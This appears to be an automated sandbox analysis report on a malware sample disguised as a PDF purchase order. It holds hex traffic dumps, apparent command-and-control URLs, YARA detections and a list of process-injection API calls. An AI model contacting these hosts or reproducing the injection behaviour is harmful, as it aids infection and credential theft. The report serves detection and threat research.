bf 4b 50 de 5a 2d af f1 25 be b9 3e 0e 1f 0a 32 36 fc 7d 2d 10 e2 13 21 0c d7 d1 d8 af 0c 1e 2a 50 70 c8 9b d9 90 fc 0e 88 5d bd 19 de 37 6e 57 66 b0 1c cf d7 13 62 fc 23 7e f0 80 8b 98 d0 04 1f b5 b5 16 c1 d2 fa 18 7f 77 e3 47 c3 8e d5 b1 dc ca e3 e3 f9 59 e3 9b e7 c6 6f b3 20 36 a6 c1 dc 37 f0 d7 5b 27 a1 79 ed 2f fd 08 24 27 c6 37 8d b3 e7 69 2f 09 ea cb da c3 8d 17 19 61 3d ae fb e7 ea b9 31 ae fa b5 87 24 ba e7 77 c9 f0 21 5e af a8 6b fe e6 c7 49 3c f0 eb 49 b0 c0 27 6f b1 1a 54 97 fe ad f1 03 10 d7 ac 1b 6f be f6 df 4e ab b5 c7 f3 d8 8f 63 28 e4 bb 24 8c 20 77 0b bd fe 27 d4 b6 1a d6 ff cf bb b7 ff 61 c5 49 84 56 0b a6 f7 d5 a4 56 7b 64 c5 23 72 8f 8f 29 f9 55 15 34 88 35 1f 7d d5 f7 a2 5f fd 71 52 b5 eb 76 1d df bd e5 8d 87 76 25 cb 90 7d 9d f9 c1 f5 2c a9 e1 01 6a 3d ff 0d ed 58 4d 00 6e d7 ce a9 72 c9 90 b8 fc 3d 58 26 4d f7 cf 51 e4 dd 57 7d eb 1a 3c 91 52 80 77 ef 10 d4 d6 04 80 b5 7a 34 44 d9 a3 79 5a 32 4f f5 cf c5 4d ed 3c f2 93 75 b4 34 12 cb 87 12 dc 67 d6 0f e2 ab 3d c8 97 fe Data Ascii: 26ba}
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Sat, 09 Nov 2024 04:38:17 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://eyecatch.pro/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 32 36 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7b 73 db 46 b2 ef df d6 a7 80 e9 5a 9b 4c 08 10 00 df 94 a8 9c 8d e2 9c cd bd f1 71 2a 4e ea d4 dd f5 96 0b 24 41 11 36 49 70 01 50 8f d5 ea bb df 5f f7 cc 00 03 10 7c 88 b4 53 e7 e1 c4 92 48 a0 a7 bb a7 a7 a7 1f f3 bc 78 fe c3 db ab df fe df 2f af 8d 59 b2 98 5f 9e 5d d0 1f 63 ee 2d af 87 15 7f 69 fe fb f7 15 63 3c f7 e2 78 58 59 86 e6 c7 b8 42 10 be 37 b9 3c 7b 76 b1 f0 13 cf 18 cf bc 28 f6 93 61 e5 f7 df 7e 34 7b 15 a3 91 be 59 7a 0b 7f 58 b9 09 fc db 55 18 25 40 13 2e 13 7f 09 c8 db 60 92 cc 86 13 ff 26 18 fb 26 7f a9 1b c1 32 48 02 6f 6e c6 63 6f ee 0f 1d 89 27 1e 47 c1 2a b9 ac 4e d7 cb 71 12 84 cb 2a 31 57 7b a0 df 16 73 f5 1f a0 61 0c 99 f5 ec 81 15 f9 ab b9 37 f6 ab 8d f7 23 66 fa fd a8 51 7f f5 31 7e 55 7b ac 55 27 e1 78 bd 00 1b 96 fa f0 7a ee d3 f7 da f9 45 43 92 3b bb 48 82 64 ee 5f fe e2 5d fb c6 32 4c 8c 69 b8 5e 4e 8c 97 2f 7a ae e3 9c 1b af ef fd 2b 2f 19 cf 8c 5f a2 f0 a2 21 40 cf 84 30 b8 ca af a2 70 14 26 f1 ab b4 c2 af 96 61 b0 9c f8 77 75 20 9b 86 f3 79 78 fb 8a c4 74 31 0f 96 9f 8c c8 9f 0f 2b de 3c f1 a3 a5 97 f8 15 23 b9 5f 41 6a de 6a 35 0f c6 1e d5 b9 11 c5 f1 b7 77 8b 39 5e 11 57 c3 8a 4e df 78 19 79 ff 58 87 e7 c6 8f be 3f a9 18 b3 c8 9f 0e 2b b3 24 59 c5 83 46 c3 bf f7 81 62 3c b3 56 51 d8 98 32 c0 e7 26 7b 15 2e 48 78 f1 7e fa 63 09 a9 31 a2 c4 7d 0b e9 84 b7 d6 87 db 95 bf 08 3f 06 ef fc 24 09 96 d7 31 da f5 a1 32 f2 62 ff f7 68 5e 19 c8 5a bd 6f bc 6f c4 d6 ad 15 46 d7 ef 1b c1 02 2d 14 bf 6f 8c c3 c8 7f df e0 c2 ef 1b 4e db b2 ad e6 fb 46 d7 bd eb ba ef 1b 95 7a c5 
bf 4b 50 de 5a 2d af f1 25 be b9 3e 0e 1f 0a 32 36 fc 7d 2d 10 e2 13 21 0c d7 d1 d8 af 0c 1e 2a 50 70 c8 9b d9 90 fc 0e 88 5d bd 19 de 37 6e 57 66 b0 1c cf d7 13 62 fc 23 7e f0 80 8b 98 d0 04 1f b5 b5 16 c1 d2 fa 18 7f 77 e3 47 c3 8e d5 b1 dc ca e3 e3 f9 59 e3 9b e7 c6 6f b3 20 36 a6 c1 dc 37 f0 d7 5b 27 a1 79 ed 2f fd 08 24 27 c6 37 8d b3 e7 69 2f 09 ea cb da c3 8d 17 19 61 3d ae fb e7 ea b9 31 ae fa b5 87 24 ba e7 77 c9 f0 21 5e af a8 6b fe e6 c7 49 3c f0 eb 49 b0 c0 27 6f b1 1a 54 97 fe ad f1 03 10 d7 ac 1b 6f be f6 df 4e ab b5 c7 f3 d8 8f 63 28 e4 bb 24 8c 20 77 0b bd fe 27 d4 b6 1a d6 ff cf bb b7 ff 61 c5 49 84 56 0b a6 f7 d5 a4 56 7b 64 c5 23 72 8f 8f 29 f9 55 15 34 88 35 1f 7d d5 f7 a2 5f fd 71 52 b5 eb 76 1d df bd e5 8d 87 76 25 cb 90 7d 9d f9 c1 f5 2c a9 e1 01 6a 3d ff 0d ed 58 4d 00 6e d7 ce a9 72 c9 90 b8 fc 3d 58 26 4d f7 cf 51 e4 dd 57 7d eb 1a 3c 91 52 80 77 ef 10 d4 d6 04 80 b5 7a 34 44 d9 a3 79 5a 32 4f f5 cf c5 4d ed 3c f2 93 75 b4 34 12 cb 87 12 dc 67 d6 0f e2 ab 3d c8 97 fe Data Ascii: 26ba}
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Sat, 09 Nov 2024 04:38:20 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://eyecatch.pro/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 32 36 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7b 73 db 46 b2 ef df d6 a7 80 e9 5a 9b 4c 08 10 00 df 94 a8 9c 8d e2 9c cd bd f1 71 2a 4e ea d4 dd f5 96 0b 24 41 11 36 49 70 01 50 8f d5 ea bb df 5f f7 cc 00 03 10 7c 88 b4 53 e7 e1 c4 92 48 a0 a7 bb a7 a7 a7 1f f3 bc 78 fe c3 db ab df fe df 2f af 8d 59 b2 98 5f 9e 5d d0 1f 63 ee 2d af 87 15 7f 69 fe fb f7 15 63 3c f7 e2 78 58 59 86 e6 c7 b8 42 10 be 37 b9 3c 7b 76 b1 f0 13 cf 18 cf bc 28 f6 93 61 e5 f7 df 7e 34 7b 15 a3 91 be 59 7a 0b 7f 58 b9 09 fc db 55 18 25 40 13 2e 13 7f 09 c8 db 60 92 cc 86 13 ff 26 18 fb 26 7f a9 1b c1 32 48 02 6f 6e c6 63 6f ee 0f 1d 89 27 1e 47 c1 2a b9 ac 4e d7 cb 71 12 84 cb 2a 31 57 7b a0 df 16 73 f5 1f a0 61 0c 99 f5 ec 81 15 f9 ab b9 37 f6 ab 8d f7 23 66 fa fd a8 51 7f f5 31 7e 55 7b ac 55 27 e1 78 bd 00 1b 96 fa f0 7a ee d3 f7 da f9 45 43 92 3b bb 48 82 64 ee 5f fe e2 5d fb c6 32 4c 8c 69 b8 5e 4e 8c 97 2f 7a ae e3 9c 1b af ef fd 2b 2f 19 cf 8c 5f a2 f0 a2 21 40 cf 84 30 b8 ca af a2 70 14 26 f1 ab b4 c2 af 96 61 b0 9c f8 77 75 20 9b 86 f3 79 78 fb 8a c4 74 31 0f 96 9f 8c c8 9f 0f 2b de 3c f1 a3 a5 97 f8 15 23 b9 5f 41 6a de 6a 35 0f c6 1e d5 b9 11 c5 f1 b7 77 8b 39 5e 11 57 c3 8a 4e df 78 19 79 ff 58 87 e7 c6 8f be 3f a9 18 b3 c8 9f 0e 2b b3 24 59 c5 83 46 c3 bf f7 81 62 3c b3 56 51 d8 98 32 c0 e7 26 7b 15 2e 48 78 f1 7e fa 63 09 a9 31 a2 c4 7d 0b e9 84 b7 d6 87 db 95 bf 08 3f 06 ef fc 24 09 96 d7 31 da f5 a1 32 f2 62 ff f7 68 5e 19 c8 5a bd 6f bc 6f c4 d6 ad 15 46 d7 ef 1b c1 02 2d 14 bf 6f 8c c3 c8 7f df e0 c2 ef 1b 4e db b2 ad e6 fb 46 d7 bd eb ba ef 1b 95 7a c5 
bf 4b 50 de 5a 2d af f1 25 be b9 3e 0e 1f 0a 32 36 fc 7d 2d 10 e2 13 21 0c d7 d1 d8 af 0c 1e 2a 50 70 c8 9b d9 90 fc 0e 88 5d bd 19 de 37 6e 57 66 b0 1c cf d7 13 62 fc 23 7e f0 80 8b 98 d0 04 1f b5 b5 16 c1 d2 fa 18 7f 77 e3 47 c3 8e d5 b1 dc ca e3 e3 f9 59 e3 9b e7 c6 6f b3 20 36 a6 c1 dc 37 f0 d7 5b 27 a1 79 ed 2f fd 08 24 27 c6 37 8d b3 e7 69 2f 09 ea cb da c3 8d 17 19 61 3d ae fb e7 ea b9 31 ae fa b5 87 24 ba e7 77 c9 f0 21 5e af a8 6b fe e6 c7 49 3c f0 eb 49 b0 c0 27 6f b1 1a 54 97 fe ad f1 03 10 d7 ac 1b 6f be f6 df 4e ab b5 c7 f3 d8 8f 63 28 e4 bb 24 8c 20 77 0b bd fe 27 d4 b6 1a d6 ff cf bb b7 ff 61 c5 49 84 56 0b a6 f7 d5 a4 56 7b 64 c5 23 72 8f 8f 29 f9 55 15 34 88 35 1f 7d d5 f7 a2 5f fd 71 52 b5 eb 76 1d df bd e5 8d 87 76 25 cb 90 7d 9d f9 c1 f5 2c a9 e1 01 6a 3d ff 0d ed 58 4d 00 6e d7 ce a9 72 c9 90 b8 fc 3d 58 26 4d f7 cf 51 e4 dd 57 7d eb 1a 3c 91 52 80 77 ef 10 d4 d6 04 80 b5 7a 34 44 d9 a3 79 5a 32 4f f5 cf c5 4d ed 3c f2 93 75 b4 34 12 cb 87 12 dc 67 d6 0f e2 ab 3d c8 97 fe Data Ascii: 26ba}
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 09 Nov 2024 04:38:29 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669534fa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 09 Nov 2024 04:38:31 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669534fa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 09 Nov 2024 04:38:34 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669534fa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 09 Nov 2024 04:38:36 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669534fa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: shutdown.exe, 00000007.00000002.4473736841.0000000004452000.00000004.10000000.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000009.00000002.4473238785.0000000003D42000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://estrela-b.online/e3rr/?J8LHgDJp=IgJ9cBvr78oV/XAx6CGZHJrYQ
                Source: shutdown.exe, 00000007.00000002.4473736841.0000000004C2C000.00000004.10000000.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000009.00000002.4473238785.000000000451C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://eyecatch.pro/42c3/?J8LHgDJp=JBDdfBWF/aARUf0PyG02RiIz2qli5PW
                Source: New PO [FK4-7173].pdf.exe, 00000000.00000002.2018067179.00000000027C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: MKVNVRSuoK.exe, 00000009.00000002.4475014817.00000000052F8000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.jllllbx.top
                Source: MKVNVRSuoK.exe, 00000009.00000002.4475014817.00000000052F8000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.jllllbx.top/gv4o/
                Source: shutdown.exe, 00000007.00000002.4475619589.0000000005EB0000.00000004.00000800.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4473736841.0000000003954000.00000004.10000000.00040000.00000000.sdmp, MKVNVRSuoK.exe, 00000009.00000002.4473238785.0000000003244000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2504642896.000000000C4E4000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.tubetrexhd.buzz/2t4j?gp=1&js=1&uuid=1731126929.9738454148&other_args=eyJ1cmkiOiAiLzJ0NGoi
                Source: firefox.exe, 0000000A.00000002.2504642896.000000000C4E4000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www70.tubetrexhd.buzz/
                Source: shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: shutdown.exe, 00000007.00000002.4472317980.000000000284F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: shutdown.exe, 00000007.00000002.4472317980.000000000287F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: shutdown.exe, 00000007.00000002.4472317980.000000000284F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: shutdown.exe, 00000007.00000002.4472317980.000000000284F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033h
                Source: shutdown.exe, 00000007.00000002.4472317980.000000000287F000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4472317980.000000000284F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: shutdown.exe, 00000007.00000002.4472317980.000000000284F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: shutdown.exe, 00000007.00000003.2393663132.0000000007905000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: shutdown.exe, 00000007.00000002.4475773652.00000000079E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/

                E-Banking Fraud

                Source: Yara match File source: 4.2.New PO [FK4-7173].pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 4.2.New PO [FK4-7173].pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.4473043589.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.4472088582.00000000026C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000009.00000002.4475014817.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.2238337409.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000007.00000002.4473189897.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.4473138354.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.2221565153.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: New PO [FK4-7173].pdf.exe, CompositeType.cs Large array initialization: array initializer size 821658
                Source: 7.2.shutdown.exe.356cd14.2.raw.unpack, CompositeType.cs Large array initialization: array initializer size 821658
                Source: initial sample Static PE information: Filename: New PO [FK4-7173].pdf.exe
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe Process created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Code function: 4_2_0042C8C3 NtClose,4_2_0042C8C3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Code function: 4_2_01172B60 NtClose,LdrInitializeThunk,4_2_01172B60
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Code function: 4_2_01172DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01172DF0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Code function: 4_2_01172C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01172C70
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Code function: 4_2_011735C0 NtCreateMutant,LdrInitializeThunk,4_2_011735C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Code function: 4_2_01174340 NtSetContextThread,4_2_01174340
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Code function: 4_2_01174650 NtSuspendThread,4_2_01174650
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Code function: 4_2_01172B80 NtQueryInformationFile,4_2_01172B80
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Code function: 4_2_01172BA0 NtEnumerateValueKey,4_2_01172BA0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Code function: 4_2_01172BF0 NtAllocateVirtualMemory,4_2_01172BF0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Code function: 4_2_01172BE0 NtQueryValueKey,4_2_01172BE0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Code function: 4_2_01172AB0 NtWaitForSingleObject,4_2_01172AB0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Code function: 4_2_01172AD0 NtReadFile,4_2_01172AD0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Code function: 4_2_01172AF0 NtWriteFile,4_2_01172AF0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Code function: 4_2_01172D10 NtMapViewOfSection,4_2_01172D10
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Code function: 4_2_01172D00 NtSetInformationFile,4_2_01172D00
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172D30 NtUnmapViewOfSection,4_2_01172D30
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172DB0 NtEnumerateKey,4_2_01172DB0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172DD0 NtDelayExecution,4_2_01172DD0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172C00 NtQueryInformationProcess,4_2_01172C00
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172C60 NtCreateKey,4_2_01172C60
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172CA0 NtQueryInformationToken,4_2_01172CA0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172CC0 NtQueryVirtualMemory,4_2_01172CC0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172CF0 NtOpenProcess,4_2_01172CF0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172F30 NtCreateSection,4_2_01172F30
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172F60 NtCreateProcessEx,4_2_01172F60
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172F90 NtProtectVirtualMemory,4_2_01172F90
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172FB0 NtResumeThread,4_2_01172FB0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172FA0 NtQuerySection,4_2_01172FA0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172FE0 NtCreateFile,4_2_01172FE0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172E30 NtWriteVirtualMemory,4_2_01172E30
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172E80 NtReadVirtualMemory,4_2_01172E80
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172EA0 NtAdjustPrivilegesToken,4_2_01172EA0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172EE0 NtQueueApcThread,4_2_01172EE0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01173010 NtOpenDirectoryObject,4_2_01173010
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01173090 NtSetValueKey,4_2_01173090
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011739B0 NtGetContextThread,4_2_011739B0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01173D10 NtOpenProcessToken,4_2_01173D10
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01173D70 NtOpenThread,4_2_01173D70
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB4340 NtSetContextThread,LdrInitializeThunk,7_2_02FB4340
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB4650 NtSuspendThread,LdrInitializeThunk,7_2_02FB4650
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2AF0 NtWriteFile,LdrInitializeThunk,7_2_02FB2AF0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2AD0 NtReadFile,LdrInitializeThunk,7_2_02FB2AD0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_02FB2BF0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_02FB2BE0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_02FB2BA0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2B60 NtClose,LdrInitializeThunk,7_2_02FB2B60
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_02FB2EE0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_02FB2E80
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2FE0 NtCreateFile,LdrInitializeThunk,7_2_02FB2FE0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2FB0 NtResumeThread,LdrInitializeThunk,7_2_02FB2FB0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2F30 NtCreateSection,LdrInitializeThunk,7_2_02FB2F30
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_02FB2CA0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02FB2C70
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2C60 NtCreateKey,LdrInitializeThunk,7_2_02FB2C60
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02FB2DF0
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_02FB2DD0 NtDelayExecution,LdrInitializeThunk,7_2_02FB2DD0
